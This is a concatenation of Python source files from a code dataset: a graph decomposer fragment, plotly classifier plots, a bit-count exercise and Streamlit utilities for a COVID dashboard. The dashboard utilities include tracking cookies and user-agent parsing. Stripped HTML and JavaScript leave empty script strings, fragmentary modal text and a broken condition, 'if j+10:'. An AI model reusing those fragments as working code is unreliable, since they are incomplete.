return neighbors\n \n def U(m_):\n u_=set()\n for i in xrange(m.shape[0]):\n ok = True\n K_ = _get_indices(m, i)\n for j in K_:\n ok &= j in m_\n if ok:\n u_.add(i)\n return u_\n\n self._m = [set(initial_cols) | get_neighbors(set(initial_cols))]\n self._s = [set()]\n self._u = [set()]\n\n i = len(self._m)\n J = get_neighbors(self._m[i - 1])\n while True:\n M_ = J - self._m[i - 1] - self._s[i - 1]\n if not len(M_):\n break\n T = get_neighbors(M_)\n J_ = T - M_\n self._m.append(M_)\n self._u.append(set())\n self._s.append(J_ & J)\n self._m[i - 1] -= self._s[i]\n J = T\n i += 1\n \n for j in range(i):\n current= self._m[j] | self._s[j]\n if j+1 < i:\n current.update(self._s[j+1])\n self._u[j] = U(current)\n \n tree = DecompositionTree(self._model)\n \n for j in range(m.shape[1]):\n self._p.append(j)\n self._used.append(0)\n self._used2.append(0)\n \n self._layers=[]\n self._layermodel=[]\n for j in range(i):\n self._layers.append([])\n self._layermodel.append([])\n for j in range(i-1,-1,-1):\n current=self._m[j] | self._s[j]\n separator=set() | self._s[j]\n if j+10:\n tree.add_edge(self._layermodel[j][-1], self._layermodel[j+1][_k],\n [self.get_model().get_columns_names()[i] for i in self._layers[j][-1] & self._layers[j+1][_k]])\n for k in separator:\n T=get_neighbors([k])\n for _k in T:\n if self._used[_k]:\n self.unite_components(k,_k)\n tree.set_root(self._layermodel[0][0])\n \n\n self._decomposition_tree = tree\n","sub_path":"src/main/python/les/decomposers/finkelstein_adv_decomposer.py","file_name":"finkelstein_adv_decomposer.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"24663035","text":"\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix, roc_curve, auc\n\n\nimport plotly.graph_objs as go\nimport plotly.figure_factory as ff\nfrom plotly.offline import iplot\n\nfrom palantiri.BasePlotHandlers import PlotHandler\n\n\nclass ClassifierPlotHandler(PlotHandler):\n \"\"\" Handles all the plots related of the chosen classifier. 
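Prediction plots themselves are provided by the 2D/3D subclasses below. 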
\"\"\"\n\n def __init__(self, dataset, trained_classifier, **params):\n \"\"\"\n Initialization function\n :param dataset: the dataset in a dict format with the following keys:\n 'data' - numpy array with all the data points.\n 'target' - the label of the corresponding data point.\n 'target_names' - the label name.\n\n :param trained_classifier: sklearn classifier (trained / fitted).\n In order to plot the ROC plot - the classifier should have the predict_proba ability.\n :param params: other params\n \"\"\"\n\n self._dataset = dataset\n self._trained_classifier = trained_classifier\n\n self._n_classes = len(set(dataset['target']))\n\n if hasattr(self._dataset, 'target_names'):\n self.class_names = self._dataset['target_names']\n else:\n self.class_names = ['Class {0}'.format(i) for i in range(self.n_classes)]\n\n # Score of the predicted target store.\n if hasattr(self._trained_classifier, 'predict_proba'):\n self._predicted_target_score = self._trained_classifier.predict_proba(self._dataset['data'])\n else:\n self._predicted_target_score = None\n\n self._confusion_matrix = None\n self.confusion_matrix_colorscale = 'Viridis'\n\n self.prediction_figure = None\n self.roc_figure = None\n self.confusion_matrix_figure = None\n\n super(ClassifierPlotHandler, self).__init__(**params)\n\n @classmethod\n def from_pandas_dataframe(cls, dataframe, trained_classifier, **params):\n \"\"\"\n Constructing the handler from a pandas dataframe.\n :param dataframe: the dataframe form which the handler is constructed.\n The 'target' column should be included in the dataframe.\n :param trained_classifier: sklearn classifier (trained / fitted).\n :param params: other params.\n :return: returns the classifier plot handler object.\n \"\"\"\n\n assert 'target' in dataframe.columns.values, 'target values not in dataframe'\n\n dataset = dict()\n dataset['data'] = dataframe.drop('target', axis=1).values\n dataset['target'] = dataframe['target'].values\n dataset['feature_names'] = dataframe.drop('target', axis=1).columns.values\n return cls(dataset, trained_classifier, **params)\n\n @property\n def trained_classifier(self):\n \"\"\"\n The trained classifier .\n :return: The classifier in the sklearn format.\n \"\"\"\n return self._trained_classifier\n\n @property\n def dataset(self):\n \"\"\"\n The dataset\n :return: The dataset as a dictionary\n \"\"\"\n return self._dataset\n\n @dataset.setter\n def dataset(self, dataset):\n \"\"\"\n The dataset setter.\n :param dataset: the new dataset\n \"\"\"\n self._dataset = dataset\n\n @property\n def predicted_target_score(self):\n \"\"\"\n The predicted score - available if classifier has the predict_proba functionality.\n :return: The predicted score.\n \"\"\"\n return self._predicted_target_score\n\n @property\n def confusion_matrix(self):\n \"\"\"\n The confusion matrix.\n :return: The confusion matrix as a numpy array.\n \"\"\"\n return self._confusion_matrix\n\n @property\n def n_classes(self):\n \"\"\"\n The number of classes.\n :return: An int representing the number of classes.\n \"\"\"\n return self._n_classes\n\n def build_confusion_matrix(self, normalize=False):\n \"\"\"\n Building the confusion matrix\n :param normalize: if True confusion matrix is normalized.\n \"\"\"\n\n prediction = self.trained_classifier.predict(self._dataset['data'])\n\n self._confusion_matrix = confusion_matrix(self._dataset['target'], prediction)\n\n if normalize:\n self._confusion_matrix = \\\n self._confusion_matrix.astype('float') / self._confusion_matrix.sum(axis=1)[:, np.newaxis]\n 
else:\n self._confusion_matrix = self._confusion_matrix\n\n def build_confusion_matrix_figure(self, figure_layout):\n \"\"\"\n Builds the confusion matrix figure in confusion_matrix_figure.\n :param figure_layout: figure layout - plot.ly layout object.\n \"\"\"\n\n if not self._confusion_matrix:\n self.build_confusion_matrix()\n\n cm = np.flipud(self._confusion_matrix)\n x = list(self.class_names)\n y = list(reversed(self.class_names))\n\n self.confusion_matrix_figure = ff.create_annotated_heatmap(z=cm, x=x, y=y,\n colorscale=self.confusion_matrix_colorscale)\n\n self.confusion_matrix_figure['layout'].update(figure_layout)\n\n def plot_confusion_matrix(self, figure_layout=None):\n \"\"\"\n Plotting the confusion matrix figure with plot.ly's iplot function.\n :param figure_layout: figure layout - plot.ly layout object.\n \"\"\"\n\n if not figure_layout:\n figure_layout = go.Layout(\n xaxis={'title': 'Confusion Matrix
<br>
Predicted Value'},\n yaxis={'title': 'True Value'})\n\n if not self.confusion_matrix_figure:\n self.build_confusion_matrix_figure(figure_layout)\n else:\n self.confusion_matrix_figure['layout'].update(figure_layout)\n\n iplot(self.confusion_matrix_figure)\n\n def build_roc_figure(self, figure_layout=go.Layout()):\n \"\"\"\n Building the ROC curve figure of the classifier.\n :param figure_layout: figure layout - plot.ly layout object.\n \"\"\"\n\n data = list()\n\n if self.n_classes < 3:\n # False positive rate and true positive rate - computed from roc_curve()\n fpr, tpr, _ = roc_curve(self.dataset['target'], self.predicted_target_score[:, 1])\n\n # Area under curve.\n roc_auc = auc(fpr, tpr)\n\n # Updating the data list.\n data.append(go.Scatter(x=fpr,\n y=tpr,\n hoverinfo='y',\n mode='lines',\n line=dict(color='darkorange'),\n name='ROC curve (area = %0.2f)' % roc_auc))\n else:\n\n # False Positive, True Positive rates and Area Under Curve values for each class.\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n\n for i in range(self.n_classes):\n fpr[i], tpr[i], _ = roc_curve((self.dataset['target'] == i).astype(float),\n self.predicted_target_score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n data.append(go.Scatter(x=fpr[i],\n y=tpr[i],\n hoverinfo='y',\n mode='lines',\n name='ROC curve of class {0} (area = {1:0.2f})'''.format(\n self.class_names[i], roc_auc[i])))\n\n # Diagonal\n data.append(go.Scatter(x=[0, 1], y=[0, 1],\n mode='lines',\n hoverinfo='skip',\n line=dict(color='navy', dash='dash'),\n showlegend=False))\n\n self.roc_figure = go.Figure(data=data, layout=figure_layout)\n\n def plot_roc(self, figure_layout=None):\n \"\"\"\n Plotting the ROC curve figure with plot.ly's iplot function.\n :param figure_layout: figure layout - plot.ly Layout object.\n \"\"\"\n\n if not figure_layout:\n figure_layout = go.Layout(title=dict(text='ROC Curve', x=0.5),\n xaxis=dict(title='False Positive Rate'),\n yaxis=dict(title='True Positive Rate'))\n\n if not self.roc_figure:\n self.build_roc_figure(figure_layout=figure_layout)\n else:\n self.roc_figure['layout'].update(figure_layout)\n\n iplot(self.roc_figure)\n\n def build_prediction_figure(self, figure_layout):\n \"\"\"\n Building the classifier prediction figure.\n :param figure_layout: figure layout - plot.ly Layout object.\n \"\"\"\n\n pass\n\n def plot_prediction(self, figure_layout=None):\n \"\"\"\n Plotting the prediction figure with plot.ly's iplot function.\n :param figure_layout: figure layout - plot.ly Layout object.\n \"\"\"\n\n if not figure_layout:\n figure_layout = go.Layout(title=dict(text='Classifier Prediction', x=0.5))\n\n if not self.prediction_figure:\n self.build_prediction_figure(figure_layout=figure_layout)\n else:\n self.prediction_figure['layout'].update(figure_layout)\n\n iplot(self.prediction_figure)\n\n def save_prediction_figure(self, file_name):\n \"\"\"\n Saving the prediction figure as an html file.\n :param file_name: the html file name.\n \"\"\"\n\n self.save_figure(self.prediction_figure, file_name)\n\n def save_roc_figure(self, file_name):\n \"\"\"\n Saving the ROC curve figure as an html file.\n :param file_name: the html file name.\n \"\"\"\n\n self.save_figure(self.roc_figure, file_name)\n\n def save_confusion_matrix_figure(self, file_name):\n \"\"\"\n Saving the confusion matrix figure as an html file.\n :param file_name: the html file name.\n \"\"\"\n\n self.save_figure(self.confusion_matrix_figure, file_name)\n\n\nclass TwoDimensionalClassifierPlotHandler(ClassifierPlotHandler):\n \"\"\" Handles all 
the plots related of the chosen classifier on 2D. \"\"\"\n\n def __init__(self, dataset, trained_classifier, **params):\n \"\"\"\n The initialization function of the 2D classifier plot handler.\n :param dataframe: the dataframe form which the handler is constructed.\n :param trained_classifier: sklearn classifier (trained / fitted).\n :param params: other params.\n \"\"\"\n\n dataset['data'] = dataset['data'][:, :2]\n\n super(TwoDimensionalClassifierPlotHandler, self).__init__(dataset, trained_classifier, **params)\n\n def build_prediction_figure(self, figure_layout=go.Layout(), step_size=0.01):\n \"\"\"\n Building the classifier prediction figure.\n :param figure_layout: figure layout - plot.ly Layout object.\n :param step_size: Plot resolution.\n \"\"\"\n\n data = list()\n\n x_min, x_max = self.dataset['data'][:, 0].min() - 1, self.dataset['data'][:, 0].max() + 1\n y_min, y_max = self.dataset['data'][:, 1].min() - 1, self.dataset['data'][:, 1].max() + 1\n\n x = np.arange(x_min, x_max, step_size)\n y = np.arange(y_min, y_max, step_size)\n x_mesh, y_mesh = np.meshgrid(x, y)\n\n z = self.trained_classifier.predict(np.column_stack((x_mesh.ravel(), y_mesh.ravel())))\n\n z = z.reshape(x_mesh.shape)\n\n data.append(go.Contour(x=x, y=y, z=z,\n showscale=False,\n hoverinfo='skip',\n colorscale='Viridis'))\n\n data.append(go.Scatter(x=self.dataset['data'][:, 0],\n y=self.dataset['data'][:, 1],\n text=[self.class_names[i] for i in self.dataset['target']],\n hoverinfo='text',\n mode='markers',\n marker=dict(color=self.dataset['target'],\n showscale=False,\n colorscale='Reds',\n line=dict(color='black', width=1))))\n\n if 'feature_names' in self.dataset.keys():\n figure_layout['xaxis'].update({'title': self.dataset['feature_names'][0]})\n figure_layout['yaxis'].update({'title': self.dataset['feature_names'][1]})\n\n self.prediction_figure = go.Figure(data=data, layout=figure_layout)\n\n\nclass ThreeDimensionalClassifierPlotHandler(ClassifierPlotHandler):\n \"\"\" Handles all the plots related of the chosen classifier on 3D. 
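One trace per predicted class is drawn with go.Scatter3d. 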
\"\"\"\n\n def __init__(self, dataset, trained_classifier, **params):\n \"\"\"\n The initialization function of the 3D classifier plot handler.\n :param dataframe: the dataframe form which the handler is constructed.\n :param trained_classifier: sklearn classifier (trained / fitted).\n :param params: other params.\n \"\"\"\n\n dataset['data'] = dataset['data'][:, :3]\n\n super(ThreeDimensionalClassifierPlotHandler, self).__init__(dataset, trained_classifier, **params)\n\n def build_prediction_figure(self, figure_layout=go.Layout()):\n \"\"\"\n Plotting the classifier prediction and saving the figure.\n :param figure_layout: figure layout - plot.ly Layout object.\n \"\"\"\n\n labels = self.trained_classifier.predict(self.dataset['data'])\n\n data = list()\n\n for label in set(labels):\n\n data_points = self.dataset['data'][np.in1d(labels, np.asarray(label))]\n\n data.append(go.Scatter3d(x=data_points[:, 0],\n y=data_points[:, 1],\n z=data_points[:, 2],\n text=self.class_names[label],\n hoverinfo='text',\n showlegend=True,\n name=self.class_names[label],\n mode='markers',\n marker=dict(\n line=dict(color='black', width=1))))\n\n if 'feature_names' in self.dataset.keys():\n figure_layout['scene'].update(\n dict(xaxis={'title': self.dataset['feature_names'][0]},\n yaxis={'title': self.dataset['feature_names'][1]},\n zaxis={'title': self.dataset['feature_names'][2]}))\n\n self.prediction_figure = go.Figure(data=data, layout=figure_layout)\n","sub_path":"palantiri/ClassificationPlotHandlers.py","file_name":"ClassificationPlotHandlers.py","file_ext":"py","file_size_in_byte":14676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"13884680","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'MFC'\n__time__ = '2020/6/14 21:28'\n\n\n\"\"\"\nHJ15 -- 求int型数据在内存中存储时1的个数\n\nhttps://www.nowcoder.com/practice/440f16e490a0404786865e99c6ad91c9?tpId=37&&tqId=21238&rp=1&ru=/activity/oj&qru=/ta/huawei/question-ranking\n\n题目描述\n输入一个int型的正整数,计算出该int型数据在内存中存储时1的个数。\n\n输入描述:\n 输入一个整数(int类型)\n\n输出描述:\n 这个数转换成2进制后,输出1的个数\n\"\"\"\n# 5 -> 2\nprint(bin(int(input())).count('1'))\n\n# 如果是计算0的个数,需要另行处理,因为bin把数字转为二进制后在二进制的前面会有0b,如数字8:0b1000,所以计算0需要减去1\n","sub_path":"niuke_huawei/HJ15.py","file_name":"HJ15.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"469328294","text":"import streamlit as st\nfrom streamlit.server.Server import Server\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom typing import List, Dict\nimport session\nfrom models import (\n SimulatorOutput,\n ContainmentStrategy,\n ResourceAvailability,\n BackgroundColor,\n Logo,\n Link,\n Indicator,\n AlertBackground,\n IndicatorBackground,\n Illustration,\n Product,\n Dimension,\n)\nfrom typing import List\nimport re\nimport numpy as np\nimport math\nimport pandas as pd\nimport os\n\nimport collections\nimport functools\nimport inspect\nimport textwrap\nimport yaml\nimport random\nfrom ua_parser import user_agent_parser\nimport time\nimport loader\n\nconfigs_path = os.path.join(os.path.dirname(__file__), \"configs\")\ncities = pd.read_csv(os.path.join(configs_path, \"cities_table.csv\"))\nstates = pd.read_csv(os.path.join(configs_path, \"states_table.csv\"))\n\n# DATASOURCE TOOLS\n\ndef get_inloco_url(config):\n\n api_inloco = dict()\n\n if os.getenv(\"IS_LOCAL\") == \"TRUE\":\n api_url = config[\"br\"][\"api\"][\"local\"]\n else:\n api_url = 
config[\"br\"][\"api\"][\"external\"]\n\n if os.getenv(\"INLOCO_CITIES_ROUTE\") and os.getenv(\"INLOCO_STATES_ROUTE\"):\n api_inloco[\"cities\"] = api_url + os.getenv(\"INLOCO_CITIES_ROUTE\")\n api_inloco[\"states\"] = api_url + os.getenv(\"INLOCO_STATES_ROUTE\")\n\n else:\n raise ValueError(\"Inloco routes not found in env vars!\")\n\n return api_inloco\n\n\n# DATES TOOLS\n\ndef fix_dates(df):\n for col in df.columns:\n if \"last_updated\" in col:\n df[col] = pd.to_datetime(\n df[col]\n ) # .apply(lambda x: x.strftime(\"%d/%m/%Y\"))\n return df\n\n\ndef convert_times_to_real(row):\n today = datetime.now()\n return today + timedelta(row[\"ddias\"])\n\n\n# TODO: melhorar essa funcao\ndef get_sources(user_input, data, cities_sources, resources):\n\n cols_agg = {\n \"number\": lambda x: x.sum() if np.isnan(x.sum()) == False else 0,\n \"last_updated_number\": lambda x: pd.to_datetime(x).max(),\n \"author_number\": lambda x: x.drop_duplicates().str.cat(),\n }\n\n for x in resources:\n\n for item in cols_agg.keys():\n\n col = \"_\".join([item, x])\n\n if (\n user_input[\"place_type\"] == \"state_num_id\"\n or user_input[\"place_type\"] == \"health_region_id\"\n ):\n\n user_input[col] = cities_sources[\n cities_sources[user_input[\"place_type\"]]\n == data[user_input[\"place_type\"]].iloc[0]\n ][col].agg(cols_agg[item])\n\n if user_input[\"place_type\"] == \"city_id\":\n user_input[col] = data[col].fillna(0).values[0]\n\n user_input[\"last_updated_number_beds\"] = pd.to_datetime(\n user_input[\"last_updated_number_beds\"]\n ).strftime(\"%d/%m\")\n\n user_input[\"last_updated_number_icu_beds\"] = pd.to_datetime(\n user_input[\"last_updated_number_icu_beds\"]\n ).strftime(\"%d/%m\")\n\n return user_input\n\n\n# PLACES TOOLS\n\ndef add_all(x, all_string=\"Todos\", first=None):\n formatted = [all_string] + list(x)\n if first != None:\n first_index = formatted.index(first)\n item = formatted.pop(first_index)\n formatted.insert(0, item)\n return formatted\n\n\ndef filter_place(\n dfs, place_type, state_name=None, health_region_name=None, city_name=None\n):\n\n if place_type == \"state\":\n return dfs[\"city\"][\"state_name\"].sort_values().unique()\n elif place_type == \"city\":\n data = dfs[\"city\"][dfs[\"city\"][\"state_name\"] == state_name]\n if health_region_name != None and health_region_name != \"Todos\":\n data = data.loc[data[\"health_region_name\"] == health_region_name]\n return add_all(data[\"city_name\"].sort_values().unique())\n else:\n data = dfs[\"city\"][dfs[\"city\"][\"state_name\"] == state_name]\n return add_all(data[\"health_region_name\"].sort_values().unique())\n\n\ndef choose_place(city, region, state):\n if city == \"Todos\" and region == \"Todos\":\n return state + \" (Estado)\"\n if city == \"Todos\":\n return region + \" (Região de Saúde)\"\n return city\n\n\nclass Dictionary:\n def __init__(self):\n self.dictionary = None\n\n def check_initialize(self):\n if self.dictionary is None:\n self.dictionary = loader.read_data(\n \"br\",\n loader.config,\n loader.config[\"br\"][\"api\"][\"endpoints\"][\"utilities\"][\"place_ids\"],\n )\n\n def get_place_names_by_id(self, id):\n self.check_initialize()\n if id < 100: # is state\n return [\n self.dictionary.loc[self.dictionary[\"state_num_id\"] == id][\n \"state_name\"\n ].values[0]\n ]\n elif id < 10000: # is health regional\n row = self.dictionary.loc[self.dictionary[\"health_region_id\"] == id]\n # healh regional,stater\n return [\n row[\"health_region_name\"].values[0],\n row[\"state_name\"].values[0],\n ]\n else: # is city\n 
row = self.dictionary.loc[self.dictionary[\"city_id\"] == id]\n # city, health region, state\n return [\n row[\"city_name\"].values[0],\n row[\"health_region_name\"].values[0],\n row[\"state_name\"].values[0],\n ]\n\n def get_place_id_by_names(\n self, state_name, city_name=\"Todos\", health_region_name=None\n ):\n self.check_initialize()\n dictionary = self.dictionary.loc[self.dictionary[\"state_name\"] == state_name]\n if health_region_name is not None:\n return dictionary.loc[\n dictionary[\"health_system_region\"] == health_region_name\n ][\"health_region_id\"].values[0]\n elif city_name != \"Todos\":\n return dictionary.loc[dictionary[\"city_name\"] == city_name][\n \"city_id\"\n ].values[0]\n else:\n return dictionary[\"state_num_id\"].values[0]\n\n def get_state_alphabetical_id_by_name(self, state_name):\n self.check_initialize()\n if state_name == \"Todos\":\n return \"BR\"\n return self.dictionary.loc[self.dictionary[\"state_name\"] == state_name][\n \"state_id\"\n ].values[0]\n\n# def get_state_str_id_by_id(place_id):\n\n# states = pd.read_csv(\n# os.path.join(\n# os.path.join(os.path.dirname(__file__), \"configs\"), \"states_table.csv\"\n# )\n# )\n\n# index = [i for i in states.columns].index(\"state_id\")\n# return states.query(\"state_num_id == '%s'\" % place_id).values[0][index]\n\n\ndef get_ufs_list():\n\n return [\n \"AC\",\n \"AL\",\n \"AM\",\n \"AP\",\n \"BA\",\n \"CE\",\n \"DF\",\n \"ES\",\n \"GO\",\n \"MA\",\n \"MG\",\n \"MS\",\n \"MT\",\n \"PA\",\n \"PB\",\n \"PE\",\n \"PI\",\n \"PR\",\n \"RJ\",\n \"RN\",\n \"RO\",\n \"RR\",\n \"RS\",\n \"SC\",\n \"SE\",\n \"SP\",\n \"TO\",\n ]\n\n\n# FRONT-END TOOLS\n# AMPLITUDE ANALYTICS HELPER METHODS\n# PLUS SOME EXTRA STREAMLIT HACKING\n# Kept for backwards compatibility reasons\ndef get_server_session():\n return session._get_session_raw()\n\n\ndef manage_user_existence(user_session, session_state):\n \"\"\" \n Decides whether the user is new and, if so, generates a random id. \n Will not try twice: if the user refuses to hold our cookies, we treat\n them as the anonymous user and give up trying to give them our cookie.\n \"\"\"\n user_data = parse_headers(user_session.ws.request)\n if session_state.already_generated_user_id is None:\n session_state.already_generated_user_id = False\n\n if user_data[\"cookies_initialized\"] is False:\n # Sometimes the browser doesn't load up upfront so we need this\n reload_window()\n time.sleep(1)\n else:\n if (\n \"user_unique_id\" not in user_data[\"Cookie\"].keys()\n and session_state.already_generated_user_id is False\n ):\n hash_id = gen_hash_code(size=32)\n session_state.already_generated_user_id = True\n update_user_public_info()\n time.sleep(0.1)\n give_cookies(\"user_unique_id\", hash_id, 99999, True)\n\n\ndef gen_hash_code(size=16):\n return \"\".join(\n random.choice(\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv\")\n for i in range(size)\n )\n\n\ndef parse_headers(request):\n \"\"\" Takes a raw streamlit request header and converts it to a nicer dictionary \"\"\"\n data = dict(request.headers.items())\n ip = request.remote_ip\n if \"Cookie\" in data.keys():\n data[\"Cookie\"] = dict([i.split(\"=\", 1) for i in data[\"Cookie\"].split(\"; \")])\n data[\"cookies_initialized\"] = True\n else:\n data[\"Cookie\"] = dict()\n data[\"cookies_initialized\"] = False\n if \"user_public_data\" in data[\"Cookie\"].keys():\n data[\"Cookie\"][\"user_public_data\"] = dict(\n [i.split(\"|:\") for i in 
data[\"Cookie\"][\"user_public_data\"].split(\"|%\")]\n )\n data[\"Remote_ip\"] = ip\n data.update(parse_user_agent(data[\"User-Agent\"]))\n return data\n\n\ndef parse_user_agent(ua_string):\n in_data = user_agent_parser.Parse(ua_string)\n out_data = dict()\n data_reference = [\n [\"os_name\", [\"os\", \"family\"]],\n [\"os_version\", [\"os\", \"major\"]],\n [\"device_manufacturer\", [\"device\", \"brand\"]],\n [\"device_model\", [\"device\", \"model\"]],\n [\"platform\", [\"user_agent\", \"family\"]],\n [\"app_version\", [\"user_agent\", \"major\"]],\n ]\n for key_in, keys_out in data_reference:\n try:\n out_data[\"ua_\" + key_in] = in_data[keys_out[0]][keys_out[1]]\n except:\n out_data[\"ua_\" + key_in] = None\n return out_data\n\n\ndef give_cookies(cookie_name, cookie_info, cookie_days=99999, rerun=False):\n \"\"\" Gives the user a browser cookie \"\"\"\n # Cookie days is how long in days will the cookie last\n st.write(\n f\"\"\"\"\"\",\n unsafe_allow_html=True,\n )\n if rerun:\n time.sleep(1)\n reload_window()\n # session.rerun()\n\n\ndef update_user_public_info():\n \"\"\" updates the user's public data for us like his ip address and geographical location \"\"\"\n st.write(\n f\"\"\"\n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef reload_window():\n \"\"\" Reloads the user's entire browser window \"\"\"\n st.write(\n f\"\"\"\n \"\"\",\n unsafe_allow_html=True,\n )\n time.sleep(1)\n\n\n# END OF AMPLITUDE HELPER METHODS\n\n# JAVASCRIPT HACK METHODS\n\ndef stylizeButton(name, style_string, session_state, others=dict()):\n \"\"\" adds a css option to a button you made \"\"\"\n session_state.button_styles[name] = [style_string, others]\n\n\ndef applyButtonStyles(session_state):\n \"\"\" Use it at the end of the program to apply styles to buttons as defined by the function above \"\"\"\n time.sleep(0.1)\n html = \"\"\n for name, style in session_state.button_styles.items():\n parts = (\n style[0]\n .replace(\"\\n\", \"\")\n .replace(\" \", \"\")\n .replace(\"; \", \"&\")\n .replace(\";\", \"&\")\n .replace(\":\", \"=\")\n )\n other_args = \"&\".join(\n [str(key) + \"=\" + str(value) for key, value in style[1].items()]\n )\n html += f\"\"\"\n \"\"\"\n st.write(html, unsafe_allow_html=True)\n\n\ndef get_radio_horizontalization_html(radio_label):\n \"\"\" Takes a normal radio and restilizes it to make it horizontal and bigger\"\"\"\n html = f\"\"\"\"\"\"\n return html\n\n\ndef hide_iframes():\n st.write(\n f\"\"\"\"\"\",\n unsafe_allow_html=True,\n )\n\n\n# END OF JAVASCRIPT HACK METHODS\n\ndef gen_pdf_report():\n st.write(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef make_clickable(text, link):\n # target _blank to open new window\n # extract clickable text to display for your link\n return f'{text}'\n\n\ndef localCSS(file_name):\n with open(file_name) as f:\n st.markdown(f\"\", unsafe_allow_html=True)\n\n\ndef gen_whatsapp_button(info) -> None:\n \"\"\"Generate WPP button\n\n Args:\n info: config[\"contact\"]\n \"\"\"\n url = \"whatsapp://send?text={}&phone=${}\".format(info[\"msg\"], info[\"phone\"])\n st.write(\n \"\"\" \n \n ?\n

Dúvidas?

\n \"\"\"\n % url,\n unsafe_allow_html=True,\n )\n\n\ndef gen_info_modal():\n return f\"\"\"\n Entenda a classificação dos níveis\n
\n
\n ×\n
\n

Valores de referência

\n
\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
DimensãoIndicadorNovo NormalRisco ModeradoRisco AltoRisco Altíssimo
\n

Situação da doença


\n
Novos casos diários (Média móvel 7 dias)x<=3.73.7<x<=12.512.5<=x<=27.4x >= 27.4
Tendência de novos casos diáriosSe crescendo*, mover para o nível mais alto
Controle da doençaNúmero de reprodução efetiva<0.5<0.5 - 1><1 - 1.2> >1.2
Capacidade de respostas do sistema de saúdeProjeção de tempo para ocupação total de leitos UTI60 - 90 dias30 - 60 dias15 - 30 dias0 - 15 dias
Confiança dos dadosSubnotificação (casos não diagnosticados a cada 10 infectados)4>=x>06>=x>47>=x>610>=x>=7
\n
\n
\n * Como determinamos a tendência:\n
    \n
  • Crescendo: caso o aumento de novos casos esteja acontecendo por pelo menos 5 dias.
  • \n
  • Descrescendo: caso a diminuição de novos casos esteja acontecendo por pelo menos 14 dias.
  • \n
  • Estabilizando: qualquer outra mudança.
  • \n
\n
\n
\n
\n
\"\"\"\n\n\n# VIEW COMPONENTS FAROLCOVID\n\ndef genHeroSection(title1: str, title2: str, subtitle: str, logo: str, header: bool):\n\n if header:\n header = \"\"\"coronacidades\"\"\"\n else:\n header = \"\"\"
\"\"\"\n\n st.write(\n f\"\"\"\n
\n
\n
\n {header}\n
\n {title1}
{title2}
\n {subtitle}\n
\n
\n
\n \n
\n
\n
\n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef genInputFields(user_input, config, session):\n\n # # Inicia sem update\n # session.update = False\n\n authors_beds = user_input[\"author_number_beds\"]\n beds_update = user_input[\"last_updated_number_beds\"]\n\n authors_icu_beds = user_input[\"author_number_icu_beds\"]\n icu_beds_update = user_input[\"last_updated_number_icu_beds\"]\n\n if session.reset or session.number_beds == None:\n number_beds = int(\n user_input[\"number_beds\"]\n * config[\"br\"][\"simulacovid\"][\"resources_available_proportion\"]\n )\n\n number_icu_beds = int(\n user_input[\"number_icu_beds\"]\n * config[\"br\"][\"simulacovid\"][\"resources_available_proportion\"]\n )\n number_cases = int(user_input[\"population_params\"][\"I_confirmed\"])\n number_deaths = int(user_input[\"population_params\"][\"D\"])\n session.reset = False\n else:\n number_beds = int(session.number_beds)\n number_icu_beds = int(session.number_icu_beds)\n number_cases = int(session.number_cases)\n number_deaths = int(session.number_deaths)\n\n cases_update = pd.to_datetime(user_input[\"last_updated_cases\"]).strftime(\"%d/%m\")\n\n locality = user_input[\"locality\"]\n\n if locality == \"Brasil\":\n authors_beds = \"SUS e Embaixadores\"\n authors_icu_beds = \"SUS e Embaixadores\"\n\n user_input[\"number_beds\"] = st.number_input(\n f\"Número de leitos destinados aos pacientes com Covid-19 (50% do reportado em {authors_beds}; atualizado: {beds_update})\",\n 0,\n None,\n number_beds,\n )\n\n user_input[\"number_icu_beds\"] = st.number_input(\n f\"Número de leitos UTI destinados aos pacientes com Covid-19 (50% do reportado em {authors_icu_beds}; atualizado: {icu_beds_update}):\",\n 0,\n None,\n number_icu_beds,\n )\n\n user_input[\"population_params\"][\"I_confirmed\"] = st.number_input(\n f\"Casos confirmados (fonte: Brasil.IO; atualizado: {cases_update}):\",\n 0,\n None,\n number_cases,\n )\n\n user_input[\"population_params\"][\"D\"] = st.number_input(\n f\"Mortes confirmadas (fonte: Brasil.IO; atualizado: {cases_update}):\",\n 0,\n None,\n number_deaths,\n )\n\n # Faz o update quando clica o botão\n if st.button(\"Finalizar alteração\"):\n\n session.number_beds = int(user_input[\"number_beds\"])\n session.number_icu_beds = int(user_input[\"number_icu_beds\"])\n session.number_cases = int(user_input[\"population_params\"][\"I_confirmed\"])\n session.number_deaths = int(user_input[\"population_params\"][\"D\"])\n\n session.update = True\n else:\n session.update = False\n\n if st.button(\"Resetar aos valores oficais\"):\n session.reset = True\n alteration_button_style = \"\"\"border: 1px solid var(--main-white);box-sizing: border-box;border-radius: 15px; width: auto;padding: 0.5em;text-transform: uppercase;font-family: var(--main-header-font-family);color: var(--main-white);background-color: var(--main-primary);font-weight: bold;text-align: center;text-decoration: none;font-size: 14px;animation-name: fadein;animation-duration: 3s;margin-top: 1em;\"\"\"\n reset_button_style = \"\"\"position:absolute;right:3em;top:-68px;border: 1px solid var(--main-white);box-sizing: border-box;border-radius: 15px; width: auto;padding: 0.5em;text-transform: uppercase;font-family: var(--main-header-font-family);color: var(--main-white);background-color: rgb(160,170,178);font-weight: bold;text-align: center;text-decoration: none;font-size: 14px;animation-name: fadein;animation-duration: 3s;margin-top: 1em;\"\"\"\n stylizeButton(\n \"Finalizar alteração\", alteration_button_style, session,\n )\n stylizeButton(\n 
